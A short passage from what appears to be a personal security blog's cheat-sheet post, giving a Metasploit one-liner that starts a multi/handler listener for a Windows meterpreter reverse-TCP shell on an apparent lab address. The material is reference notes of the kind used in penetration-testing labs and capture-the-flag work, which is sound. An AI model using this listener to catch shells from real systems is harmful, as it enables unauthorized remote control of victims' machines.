datahackare/warz0ne/_posts/2021-03-31-CheatSheet.md

 ### [](#header-3)Listener in Metasploit

 Quick oneliner for setting up a listener in Metasploit for reverse shell for Windows.
+In this example it's a meterpreter listener.

 ```
 sudo msfconsole -x "use multi/handler;set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.10.14.10; set lport 4444; set ExitOnSession false; exploit -j"